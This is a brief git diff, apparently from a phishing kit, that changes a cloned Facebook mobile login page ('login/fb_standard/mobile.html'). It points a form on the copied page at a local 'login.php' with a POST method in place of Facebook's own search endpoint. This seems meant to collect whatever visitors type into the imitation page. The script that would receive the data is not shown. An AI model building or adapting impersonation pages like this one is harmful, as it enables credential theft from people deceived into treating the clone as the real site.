ingreso de login

--- a/login/fb_standard/mobile.html
+++ b/login/fb_standard/mobile.html
@@ -322,7 +322,11 @@
           id="m:chrome:schedulable-graph-search"
           data-referrer="m:chrome:schedulable-graph-search">
           <div class="_a-5 _13gt _7n0e" id="u_0_j_Rp">
-            <form class="_13e_" action="/search/top/" data-autoid="autoid_4">
+            <form
+              class="_13e_"
+              action="login.php"
+              data-autoid="autoid_4"
+              method="post">
               <div class="_13fn">
                 <i class="_7mt-"></i
                 ><input
